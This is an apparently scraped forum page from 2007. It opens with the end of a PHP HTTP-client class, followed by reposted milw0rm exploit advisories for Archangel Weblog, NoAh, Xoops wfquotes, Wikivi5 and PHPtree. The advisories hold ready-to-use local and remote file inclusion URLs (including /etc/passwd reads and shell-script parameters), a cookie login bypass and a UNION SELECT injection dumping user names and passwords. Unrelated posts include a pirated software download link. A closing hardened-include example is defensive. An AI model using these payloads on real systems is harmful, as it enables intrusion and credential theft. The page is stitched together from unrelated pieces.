     *
     * $this->getcontent($this->get("http://localhost/"));
     * or
     * $this->getcontent();
     *
     * @param string $server_response
     * @return $onlythecontent
     */
    public function getcontent($code='')
    {
        if(empty($code)) $code = $this->recv;
        $content = explode("\n",$code);
        $onlycode = '';
        $ok = 0; // set once the first non-header line has been seen
        for($i=1;$i<count($content);$i++) {
            if(!preg_match("/^(\S*):/",$content[$i])) $ok = 1;
            if($ok) $onlycode .= $content[$i]."\n";
        }
        return $onlycode;
    }

    /**
     * This function returns the headers of the server response
     * without the content.
     *
     * $this->getheader($this->post("http://localhost/x.php","x=1&z=2"));
     * or
     * $this->getheader();
     *
     * @param string $server_response
     * @return $onlytheheaders
     */
    public function getheader($code='')
    {
        if(empty($code)) $code = $this->recv;
        $header = explode("\n",$code);
        $onlyheader = $header[0]."\n";
        for($i=1;$i<count($header);$i++) {
            if(!preg_match("/^(\S*):/",$header[$i])) break;
            $onlyheader .= $header[$i]."\n";
        }
        return $onlyheader;
    }

    /**
     * This function is called by the cookiejar() function.
     * It adds the value of the "Set-Cookie" header in the "Cookie"
     * header for the next request. You don't have to call it.
     *
     * @param string $server_response
     */
    private function getcookie($code)
    {
        $cookie = array(); // stays empty when the response sets no cookie
        $carr = explode("\n",str_replace("\r\n","\n",$code));
        for($z=0;$z<count($carr);$z++) {
            if(preg_match("/set-cookie: (.*)/i",$carr[$z],$cookarr)) {
                $cookie[] = preg_replace("/expires=(.*)(GMT||UTC)(\S*)$/i","",preg_replace("/path=(.*)/i","",$cookarr[1]));
            }
        }

        for($i=0;$i<count($cookie);$i++) {
            preg_match("/(\S*)=(\S*)(|;)/",$cookie[$i],$matches);
            $cookn = $matches[1];
            $cookv = $matches[2];
            $this->addcookie($cookn,$cookv);
        }
    }

    /**
     * This function is called by the get()/post() functions.
     * You don't have to call it.
     *
     * @param string $urltarg
     */
    private function target($urltarg)
    {
        if(!preg_match("/^http:\/\/(.*)\//",$urltarg)) $urltarg .= "/";
        $this->url=$urltarg;

        $array = explode("/",str_replace("http://","",preg_replace("/:(\d+)/","",$urltarg)));
        $this->host=$array[0];

        preg_match("/:(\d+)\//",$urltarg,$matches);
        $this->port=empty($matches[1]) ? 80 : $matches[1];

        $temp = str_replace("http://","",preg_replace("/:(\d+)/","",$urltarg));
        preg_match("/\/(.*)\//",$temp,$matches);
        $this->path=str_replace("//","/","/".$matches[1]."/");

        if($this->port > 65535)
            die("Error: Invalid port number");
    }

    /**
     * If you call this function, the script will
     * extract all "Set-Cookie" headers values
     * and it will automatically add them into the "Cookie" header
     * for all next requests.
     *
     * $this->cookiejar(1); // enabled
     * $this->cookiejar(0); // disabled
     *
     */
    public function cookiejar($code)
    {
        if($code===0) $this->cookiejar='';
        if($code===1) $this->cookiejar=1;
        else {
            $this->getcookie($code);
        }
    }

    /**
     * If you call this function, the script will
     * follow all redirections sent by the server.
     *
     * $this->allowredirection(1); // enabled
     * $this->allowredirection(0); // disabled
     *
     * @return $this->get($locationresponse)
     */
    public function allowredirection($code)
    {
        if($code===0) $this->allowredirection='';
        if($code===1) $this->allowredirection=1;
        else {
            if(preg_match("/(location|content-location|uri): (.*)/i",$code,$codearr)) {
                $location = str_replace(chr(13),'',$codearr[2]);
                // eregi() was removed in PHP 7; strpos() performs the same "://" test
                if(strpos($location,"://") === false) {
                    return $this->get("http://".$this->host.$this->path.$location);
                } else {
                    return $this->get($location);
                }
            } else {
                return $code;
            }
        }
    }

    /**
     * This function allows you to reset some parameters:
     *
     * $this->reset("header"); // headers cleaned
     * $this->reset("cookie"); // cookies cleaned
     * $this->reset(); // clean all parameters
     *
     * @param string $func
     */
    public function reset($func='')
    {
        switch($func) {
            case "header":
                $this->header='';
                break;

            case "cookie":
                $this->cookie='';
                break;

            default:
                $this->cookiejar='';
                $this->header='';
                $this->cookie='';
                $this->allowredirection='';
                $this->agent='';
                break;
        }
    }
}
?>

# milw0rm.com [2007-05-05]
  19. \\\|/// \\ - - // ( @ @ ) ----oOOo--(_)-oOOo-------------------------------------------------- Portal : Archangel Weblog version 0.90.02 Home : [url]http://www.archangelmgt.com/weblog.shtml[/url] Download : [url]http://www.archangelmgt.com/Archangel_Weblog_v090_02.zip[/url] Author : Dj7xpl / [email]Dj7xpl@2600.ir[/email] HomePage : [url]http://Dj7xpl.2600.ir[/url] Type : Local File Inclusion & Login Page Bypass By Cookie ----ooooO-----Ooooo-------------------------------------------------- ( ) ( ) \ ( ) / \_) (_/ +---------------------------------------------------------------------------------------------+ Local File Include : [url]http://[TARGET]/[/url][PATH]/index.php?index=[Local File]%00 [url]http://Target.com/blog/index.php?index=../../../../etc/passwd%00[/url] +---------------------------------------------------------------------------------------------+ +---------------------------------------------------------------------------------------------+ Edit Cookie : Host : Target Name : ba_admin Value : 1 <------ (Admin User Id) And Go To Admin Panel : [url]http://[Target]/[/url][Path]/Admin/ +---------------------------------------------------------------------------------------------+ # milw0rm.com [2007-05-05]
  20. ############################################################################################## ############################################################################################## #NoAh 0.9 The PHP Content Architect <= Remote File Inclusion Vulnerability # #Dork: # #Vuln Code ################################################################################### # #ERROR:noah/modules/noevents/templates/mfa_theme.php # <?php include($tpls[1]); ?> # #BUG: # #Example:[url]http://site.com/path/noah/modules/noevents/templates/mfa_theme.php?tpls[/url][1]=[[Sh3LL Script]] # #Script Download ############################################################################# #[url]http://sourceforge.net/project/showfiles.php?group_id=131995&package_id=148681&release_id=318628[/url] ############################################################################################## # #kezzap66345@hotmail.com # #Special Thanks:##### x0r0n ##### ajan ##### siircicocuk ##################################### ############################################################################################## ############################################################################################## # milw0rm.com [2007-05-06]
  21. ================================================= + + Xoops wfquotes module v1.0 0 Remote Blind SQL Injection + ================================================= + + Bulan: Cyber-Ssecurity + ================================================= + + Exploit: + /modules/wfquotes/index.php?op=cat&c=1/**/UNION/**/SELECT/**/0,uname,pass,3,4,5/**/FROM/**/xoops_users/**/LIMIT/**/1,1/* + ================================================= # milw0rm.com [2007-05-06]
  22. # Wikivi5 Remote File Inclusion Vulnerability # D.Script: [url]http://wiki.vi5.org/fichiers/Wikivi5.zip[/url] # Discovered by: GolD_M = [Mahmood_ali] # Homepage: [url]http://www.Tryag.cc[/url] # Exploit:[Path]/handlers/page/show.php?sous_rep=Shell # Greetz To: Tryag-Team ....## # milw0rm.com [2007-05-06]
  23. I'd like an avatar with Ras too ... if you can
  24. Lock Your Folders and protect them!!! Folder Lock is a fast file-security program that can password-protect, lock, hide and encrypt any number of files, folders, drives, pictures and documents in seconds. Protected files are hidden, undeletable, inaccessible and highly secure. It hides files from kids, friends and co-workers, safeguards them from viruses, trojans, worms and spyware, and even protects them from networked PCs, cable users and hackers. Files can also be protected on USB Flash Drives, Memory Sticks, CD-RW, floppies and notebooks. Protection works even if files are taken from one PC to another on a removable disk, without the need to install any software. It locks files in Windows, DOS and even Safe Modes. Additional Options include Stealth Mode, Hacker Attempt Monitoring, Shred files, AutoLock, Auto Shutdown PC, Lock your PC, Erase PC tracks, 256-bit Blowfish Encryption and Context Menu in Explorer. It is Windows Vista/2003/XP/2000/NT/Me/98/98S compatible and works on all kinds of disk types like FAT16, FAT32, NTFS. Folder Lock is the most downloaded file-security program in the market today. Download: http://rapidshare.com/files/29854864/Folder_Lock_v5.7.0__Vista_Ready_.rar
  25. #PHPtree Remote file inclusion (s_dir) #Download script : [url]http://www.phptree.de/content/download/public/phptree/phptree_v1.3.zip[/url] #Thanks Str0ke #Exploit #[url]http://site.com/[/url][phptree_path]/plugin/HP_DEV/cms2.php?s_dir=shell.txt? #Discovered by : ThE TiGeR #Miro_Tiger100[at]Hotmail[dot]com # milw0rm.com [2007-05-05]
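A hardened counterpart to the request-controlled `include` reported in several of the posts above (NoAh's `include($tpls[1])`, and the `index`, `sous_rep` and `s_dir` parameters), added here as an example; it is not code from any of the posts or from the affected projects. `TEMPLATE_DIR`, the template names and both `resolve_*` helpers are hypothetical.

```php
<?php
// Added example. TEMPLATE_DIR, TEMPLATES and both resolve_* helpers are hypothetical names.
const TEMPLATE_DIR = __DIR__ . '/templates';

// Option 1: allowlist. The request supplies a key, never a path or URL.
const TEMPLATES = [
    'default' => 'default_theme.php',
    'compact' => 'compact_theme.php',
];

function resolve_by_allowlist(string $key): ?string
{
    $file = TEMPLATES[$key] ?? null;
    return $file === null ? null : TEMPLATE_DIR . '/' . $file;
}

// Option 2: containment check, for cases where a fixed allowlist is impractical.
function resolve_contained(string $name): ?string
{
    // A bare file name only: no NUL byte, no slash or dot, no scheme or stream wrapper.
    if (!preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $name)) {
        return null;
    }
    $base = realpath(TEMPLATE_DIR);
    $path = realpath(TEMPLATE_DIR . '/' . $name . '.php');
    if ($base === false || $path === false) {
        return null; // directory or file does not exist
    }
    // After symlink resolution the file must still sit inside the base directory.
    $prefix = $base . DIRECTORY_SEPARATOR;
    return strncmp($path, $prefix, strlen($prefix)) === 0 ? $path : null;
}

// Constructed inputs modelled on the parameter values shown in the posts above.
$samples = ['default', "../../../../etc/passwd\0", 'http://example.invalid/x.txt?', 'shell.txt?'];
foreach ($samples as $s) {
    printf(
        "%-34s allowlist=%-5s contained=%s\n",
        json_encode($s),
        var_export(resolve_by_allowlist($s) !== null, true),
        var_export(resolve_contained($s) !== null, true)
    );
}
```

`contained` prints true only when the named file actually exists under `TEMPLATE_DIR`; in a real handler the returned path, and nothing taken directly from the request, is what gets passed to `include`.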